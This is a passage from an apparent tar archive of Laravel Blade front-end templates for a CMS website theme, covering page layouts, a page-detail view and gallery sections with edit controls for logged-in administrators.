@endif"> <meta property="twitter:title" content="@if (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="twitter:description" content="@if (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <!-- CSRF Token --> <meta name="csrf-token" content="{{ csrf_token() }}"> <!-- Title --> <title>@if (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)) {{ $seo->meta_title }} @endif</title> @if (!empty($favicon->favicon_image)) <!-- Favicon --> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" /> @else <!-- Favicon --> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" /> @endif <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> @isset ($font) <!-- Google Fonts --> <link href="{{ $font->text_font_link }}" rel="stylesheet"> <link href="{{ $font->title_font_link }}" rel="stylesheet"> @else <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&display=swap" rel="stylesheet"> <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800&display=swap" rel="stylesheet"> @endisset <!--// Boostrap v5 //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/bootstrap.min.css') }}"> <!--// Magnific Popup //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/magnific.popup.min.css') }}"> <!--// Animate Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/animate.min.css') }}"> <!--// Vegas Slider Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/vegas.slider.min.css') }}"> <!--// Owl Carousel //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.min.css') }}"> <!--// Owl Carousel Default //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.default.min.css') }}"> <!--// Font Awesome //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/font_awesome/css/all.css') }}"> <!--// Flat Icons //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/flat_icons/flaticon.css') }}"> <style> :root { @isset ($color_option) @if ($color_option->color_option != 0) --main-color: {{ $color_option->main_color }}; --secondary-color: {{ $color_option->secondary_color }}; --scroll-button-color: {{ $color_option->scroll_button_color }}; --bottom-button-color: {{ $color_option->bottom_button_color }}; --bottom-button-hover-color: {{ $color_option->bottom_button_hover_color }}; --side-button-color: {{ $color_option->side_button_color }}; @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endif @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endisset @isset ($font) --title-font:@php echo html_entity_decode($font->title_font_family); @endphp; --text-font: @php echo html_entity_decode($font->text_font_family); @endphp; @else --title-font: 'Poppins', sans-serif; --text-font: 'Roboto', sans-serif; @endisset } </style> <!--// Theme Main Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/css/style.css') }}"> <!--// Theme Color Css //--> <!-- helper style css file --> <link rel="stylesheet" href="{{ asset('assets/frontend/css/helper-style.css') }}"> <style> #counters { background-image: url({{ asset('uploads/img/dummy/bg/counter-bg.png') }}); } </style> @if (isset($google_analytic)) <!-- Google tag (gtag.js) --> <script async src="https://www.googletagmanager.com/gtag/js?id={{ $google_analytic->google_analytic }}"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', '{{ $google_analytic->google_analytic }}'); </script> @endif @livewireStyles </head> <body data-bs-spy="scroll" data-bs-target="#fixedNavbar" @if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) class="rtl-mode" @endif @elseif (isset($language)) @if ($language->direction == 1) class="rtl-mode" @endif @endif > <!--// Page Wrapper Start //--> <div class="page-wrapper" id="wrapper"> <!--// Main Area Start //--> <main class="main-area"> @foreach ($data_object as $item) @include('frontend.sections.'.$item['folder'].'.'.$item['id']) @endforeach @unset ($item) </main> <!--// Main Area End //--> <a href="#" class="scroll-top-btn" data-scroll-goto="1"> <i class="fa fa-arrow-up"></i> </a> <!--// .scroll-top-btn // --> @include('frontend.sections.preloader.preloader') </div> <!--// Page Wrapper End //--> @include('frontend.sections.widget.bottom-style1') @include('frontend.sections.widget.side-style1') @include('frontend.sections.widget.fixed-button-style1') <!--// JQuery //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.min.js') }}"></script> <!--// Bootstrap //--> <script src="{{ asset('assets/frontend/vendor/js/bootstrap.min.js') }}"></script> <!--// Images Loaded Js //--> <script src="{{ asset('assets/frontend/vendor/js/images.loaded.min.js') }}"></script> <!--// Wow Js //--> <script src="{{ asset('assets/frontend/vendor/js/wow.min.js') }}"></script> <!--// Magnific Popup //--> <script src="{{ asset('assets/frontend/vendor/js/magnific.popup.min.js') }}"></script> <!--// Waypoint Js //--> <script src="{{ asset('assets/frontend/vendor/js/waypoint.min.js') }}"></script> <!--// Counter Up Js //--> <script src="{{ asset('assets/frontend/vendor/js/counter.up.min.js') }}"></script> <!--// JQuery Easing Functions //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.easing.min.js') }}"></script> <!--// Owl Carousel //--> <script src="{{ asset('assets/frontend/vendor/js/owl.carousel.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/validate.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/custom.select.plugin.js') }}"></script> <!--// Scroll It //--> <script src="{{ asset('assets/frontend/vendor/js/scrollit.min.js') }}"></script> <!--// Isotope Js //--> <script src="{{ asset('assets/frontend/vendor/js/isotope.min.js') }}"></script> @isset ($banner_style2) <!--// Particles Js //--> <script src="{{ asset('assets/frontend/vendor/js/particles.js') }}"></script> @endisset <!--// Zepto //--> <script src="{{ asset('assets/frontend/vendor/js/zepto.min.js') }}"></script> <!--// Vegas Slider //--> <script src="{{ asset('assets/frontend/vendor/js/vegas.slider.min.js') }}"></script> <!--// MB Youtube Player //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.mb-ytb.min.js') }}"></script> <!--// Main Js //--> <script src="{{ asset('assets/frontend/js/main.js') }}"></script> @if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) <!-- Theme Main Js --> <script src="{{ asset('assets/frontend/js/rtl-mode.js') }}"></script> @endif @elseif (isset($language)) @if ($language->direction == 1) <!-- Theme Main Js --> <script src="{{ asset('assets/frontend/js/rtl-mode.js') }}"></script> @endif @endif @isset ($banner_style3) <script> jQuery(document).ready(function() { jQuery("#heroSliderContainer").vegas({ slides: [ @if (!empty($banner_style3->section_image)) { src: "{{ asset('uploads/img/banner/'.$banner_style3->section_image) }}" }, @endif @if (!empty($banner_style3->section_image_2)) { src: "{{ asset('uploads/img/banner/'.$banner_style3->section_image_2) }}" }, @endif @if (!empty($banner_style3->section_image_3)) { src: "{{ asset('uploads/img/banner/'.$banner_style3->section_image_3) }}" }, @endif ], overlay: true, transition: 'fade2', animation: 'kenburnsUpLeft' }); }); </script> @else <script> jQuery(document).ready(function() { jQuery("#heroSliderContainer").vegas({ slides: [ { src: "{{ asset('uploads/img/dummy/1920x1080.jpg') }}" }, { src: "{{ asset('uploads/img/dummy/1920x1080.jpg') }}" }, ], overlay: true, transition: 'fade2', animation: 'kenburnsUpLeft' }); }); </script> @endif @isset ($tawk_to) <script> @php echo html_entity_decode($tawk_to->tawk_to); @endphp </script> @endisset @livewireScripts </body> </html> ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/page/page-detail.blade.php�����������������������������������������������������������0000644�����������������00000005713�14765366572�0014422 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!--// Career Section Start //--> <section class="section"> <div class="container"> <div class="row"> <div class="col-lg-8 col-md-12 mx-auto"> @if(Auth::user()) @can('page check') <div class="easier-mode"> @if(Auth::user()) @can('page check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="easier-section-area"> @endcan @endif <div class="services-detail-top"> @if (!empty($page->section_image)) <img src="{{ asset('uploads/img/page/'.$page->section_image) }}" alt="Services image" class="img-fluid"> @endif </div> <div class="services-detail-inner"> <p>@php echo html_entity_decode($page->description); @endphp</p> </div> @if(Auth::user()) @can('page check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="page.edit"> <input type="hidden" name="style" value="{{ $page->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_page') }} </button> </form> </div> </div> @endcan @endif </div> </div> </div> </section> <!--// Career Section End //--> �����������������������������������������������������views/frontend/page/show.blade.php������������������������������������������������������������������0000644�����������������00000025271�14765366572�0013227 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!DOCTYPE html> <html dir="@if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) {{ __('rtl') }} @else {{ __('ltr') }} @endif @else {{ __('ltr') }} @endif" lang="@if (session()->has('language_code_from_dropdown')){{ str_replace('_', '-', session()->get('language_code_from_dropdown')) }}@else{{ str_replace('_', '-', $language->language_code) }}@endif"> <head> <!-- Meta Tags --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> <meta name="title" content="@if (!empty($page->title)) {{ $page->title }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta name="description" content="@if (!empty($page_content->meta_description)) {{ $page_content->meta_description }} @elseif (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta name="keywords" content="@if (!empty($page_content->meta_keyword)) {{ $page_content->meta_keyword }} @elseif (!empty($page_builder->meta_keyword)) {{ $page_builder->meta_keyword }} @elseif (isset($seo)){{ $seo->meta_keyword }} @endif"> <meta name="author" content="elsecolor"> <meta property="fb:app_id" content="@if (isset($seo)){{ $seo->fb_app_id }} @endif"> <meta property="og:title" content="@if (!empty($page->title)) {{ $page->title }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="og:url" content="@if (isset($seo) || isset($page_builder)){{ url()->current() }} @endif"> <meta property="og:description" content="@if (!empty($page_content->meta_description)) {{ $page_content->meta_description }} @elseif (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta property="og:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta itemprop="image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="og:type" content="website"> <meta name="twitter:card" content="summary_large_image"> <meta name="twitter:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="twitter:title" content="@if (!empty($page->title)) {{ $page->title }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="twitter:description" content="@if (!empty($page_content->meta_description)) {{ $page_content->meta_description }} @elseif (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <!-- CSRF Token --> <meta name="csrf-token" content="{{ csrf_token() }}"> <!-- Title --> <title>@if (!empty($page->title)) {{ $page->title }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)) {{ $seo->meta_title }} @endif</title> @if (!empty($favicon->favicon_image)) <!-- Favicon --> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" /> @else <!-- Favicon --> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" /> @endif <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> @isset ($font) <!-- Google Fonts --> <link href="{{ $font->text_font_link }}" rel="stylesheet"> <link href="{{ $font->title_font_link }}" rel="stylesheet"> @else <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&display=swap" rel="stylesheet"> <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800&display=swap" rel="stylesheet"> @endisset <!--// Boostrap v5 //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/bootstrap.min.css') }}"> <!--// Magnific Popup //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/magnific.popup.min.css') }}"> <!--// Animate Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/animate.min.css') }}"> <!--// Vegas Slider Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/vegas.slider.min.css') }}"> <!--// Owl Carousel //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.min.css') }}"> <!--// Owl Carousel Default //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.default.min.css') }}"> <!--// Font Awesome //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/font_awesome/css/all.css') }}"> <!--// Flat Icons //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/flat_icons/flaticon.css') }}"> <style> :root { @isset ($color_option) @if ($color_option->color_option != 0) --main-color: {{ $color_option->main_color }}; --secondary-color: {{ $color_option->secondary_color }}; --scroll-button-color: {{ $color_option->scroll_button_color }}; --bottom-button-color: {{ $color_option->bottom_button_color }}; --bottom-button-hover-color: {{ $color_option->bottom_button_hover_color }}; --side-button-color: {{ $color_option->side_button_color }}; @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endif @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endisset @isset ($font) --title-font:@php echo html_entity_decode($font->title_font_family); @endphp; --text-font: @php echo html_entity_decode($font->text_font_family); @endphp; @else --title-font: 'Poppins', sans-serif; --text-font: 'Roboto', sans-serif; @endisset } </style> <!--// Theme Main Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/css/style.css') }}"> <!--// Theme Color Css //--> <!-- helper style css file --> <link rel="stylesheet" href="{{ asset('assets/frontend/css/helper-style.css') }}"> <style> #counters { background-image: url({{ asset('uploads/img/dummy/bg/counter-bg.png') }}); } </style> @if (isset($google_analytic)) <!-- Google tag (gtag.js) --> <script async src="https://www.googletagmanager.com/gtag/js?id={{ $google_analytic->google_analytic }}"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', '{{ $google_analytic->google_analytic }}'); </script> @endif @livewireStyles </head> <body data-bs-spy="scroll" data-bs-target="#fixedNavbar" @if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) class="rtl-mode" @endif @elseif (isset($language)) @if ($language->direction == 1) class="rtl-mode" @endif @endif > <!--// Page Wrapper Start //--> <div class="page-wrapper" id="wrapper"> @include('frontend.sections.header.header-style1') <!--// Main Area Start //--> <main class="main-area"> @include('frontend.sections.breadcrumb.breadcrumb-style1') @include('frontend.page.page-detail') @include('frontend.sections.footer.footer-style1') </main> <!--// Main Area End //--> <a href="#" class="scroll-top-btn" data-scroll-goto="1"> <i class="fa fa-arrow-up"></i> </a> <!--// .scroll-top-btn // --> @include('frontend.sections.preloader.preloader') </div> <!--// Page Wrapper End //--> @include('frontend.sections.widget.bottom-style1') @include('frontend.sections.widget.side-style1') <!--// JQuery //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.min.js') }}"></script> <!--// Bootstrap //--> <script src="{{ asset('assets/frontend/vendor/js/bootstrap.min.js') }}"></script> <!--// Images Loaded Js //--> <script src="{{ asset('assets/frontend/vendor/js/images.loaded.min.js') }}"></script> <!--// Wow Js //--> <script src="{{ asset('assets/frontend/vendor/js/wow.min.js') }}"></script> <!--// Magnific Popup //--> <script src="{{ asset('assets/frontend/vendor/js/magnific.popup.min.js') }}"></script> <!--// Waypoint Js //--> <script src="{{ asset('assets/frontend/vendor/js/waypoint.min.js') }}"></script> <!--// Counter Up Js //--> <script src="{{ asset('assets/frontend/vendor/js/counter.up.min.js') }}"></script> <!--// JQuery Easing Functions //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.easing.min.js') }}"></script> <!--// Owl Carousel //--> <script src="{{ asset('assets/frontend/vendor/js/owl.carousel.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/validate.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/custom.select.plugin.js') }}"></script> <!--// Scroll It //--> <script src="{{ asset('assets/frontend/vendor/js/scrollit.min.js') }}"></script> <!--// Isotope Js //--> <script src="{{ asset('assets/frontend/vendor/js/isotope.min.js') }}"></script> <!--// Main Js //--> <script src="{{ asset('assets/frontend/js/main.js') }}"></script> @isset ($tawk_to) <script> @php echo html_entity_decode($tawk_to->tawk_to); @endphp </script> @endisset @livewireScripts </body> </html> ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/gallery/gallery-style2.blade.php��������������������������������������������0000644�����������������00000031222�14765366572�0017471 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('gallery check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// My Works Start //--> <section class="section bg-primary-light" id="porfolio"> <div class="container"> @if (is_countable($gallery_images_paginate_style) && count($gallery_images_paginate_style) > 0) <div class="row portfolio-grid" id="portfolio-masonry-wrap"> @foreach ($gallery_images_paginate_style as $item) <div class="col-md-6 col-lg-4 portfolio-item mockup"> @if(Auth::user()) @can('gallery check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="gallery.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="portfolio-item-inner"> <div class="portfolio-item-img"> @if (!empty($item->section_image)) <img src="{{ asset('uploads/img/gallery/'.$item->section_image) }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/gallery/'.$item->section_image) }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> @else <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> @endif </div> <div class="body"> <div class="portfolio-details"> <span>{{ $item->subtitle }}</span> <h5>{{ $item->title }}</h5> </div> </div> </div> </div> @endforeach @unset ($item) </div> <div class="row mt-5"> <div class="col-xl-12"> <div class="easier-pagination-container"> {{ $gallery_images_paginate_style->links() }} </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row portfolio-grid" id="portfolio-masonry-wrap"> <div class="col-md-6 col-lg-4 portfolio-item mockup"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Mockup</span> <h5>Card Mockup</h5> </div> </div> </div> </div> <div class="col-md-6 col-lg-4 portfolio-item mockup"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Mockup</span> <h5>Mockup Box</h5> </div> </div> </div> </div> <div class="col-md-6 col-lg-4 portfolio-item mockup"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Mockup</span> <h5>Coffee Mockup</h5> </div> </div> </div> </div> <div class="col-md-6 col-lg-4 portfolio-item mockup"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Mockup</span> <h5>Square Box</h5> </div> </div> </div> </div> <div class="col-md-6 col-lg-4 portfolio-item ui"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Ui Design</span> <h5>Paper Design</h5> </div> </div> </div> </div> <div class="col-md-6 col-lg-4 portfolio-item mockup"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Mockup</span> <h5>Business Card</h5> </div> </div> </div> </div> </div> @endif @endif </div> </section> <!--// My Works End //--> @if(Auth::user()) @can('gallery check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="gallery.index"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="gallery.create"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.add_gallery') }} </button> </form> </div> </div> @endcan @endif ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/gallery/gallery-style1.blade.php��������������������������������������������0000644�����������������00000035163�14765366572�0017500 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('gallery check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// My Works Start //--> <section class="section bg-primary-light" id="porfolio"> <div class="container"> @if(Auth::user()) @can('section check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif @isset($gallery_image_section_style1) <div class="row justify-content-center"> <div class="col-lg-6"> <div class="section-heading"> <span>@php echo html_entity_decode($gallery_image_section_style1->title); @endphp</span> <h2>@php echo html_entity_decode($gallery_image_section_style1->description); @endphp</h2> </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row justify-content-center"> <div class="col-lg-6"> <div class="section-heading"> <span>Gallery</span> <h2>See all images</h2> </div> </div> </div> @endif @endisset @if (is_countable($gallery_images_style1) && count($gallery_images_style1) > 0) <div class="row portfolio-grid" id="portfolio-masonry-wrap"> @foreach ($gallery_images_style1 as $item) <div class="col-md-6 col-lg-4 portfolio-item mockup"> @if(Auth::user()) @can('gallery check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="gallery.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="portfolio-item-inner"> <div class="portfolio-item-img"> @if (!empty($item->section_image)) <img src="{{ asset('uploads/img/gallery/'.$item->section_image) }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/gallery/'.$item->section_image) }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> @else <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> @endif </div> <div class="body"> <div class="portfolio-details"> <span>{{ $item->subtitle }}</span> <h5>{{ $item->title }}</h5> </div> </div> </div> </div> @endforeach @unset ($item) </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row portfolio-grid" id="portfolio-masonry-wrap"> <div class="col-md-6 col-lg-4 portfolio-item mockup"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Mockup</span> <h5>Card Mockup</h5> </div> </div> </div> </div> <div class="col-md-6 col-lg-4 portfolio-item mockup"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Mockup</span> <h5>Mockup Box</h5> </div> </div> </div> </div> <div class="col-md-6 col-lg-4 portfolio-item mockup"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Mockup</span> <h5>Coffee Mockup</h5> </div> </div> </div> </div> <div class="col-md-6 col-lg-4 portfolio-item mockup"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Mockup</span> <h5>Square Box</h5> </div> </div> </div> </div> <div class="col-md-6 col-lg-4 portfolio-item ui"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Ui Design</span> 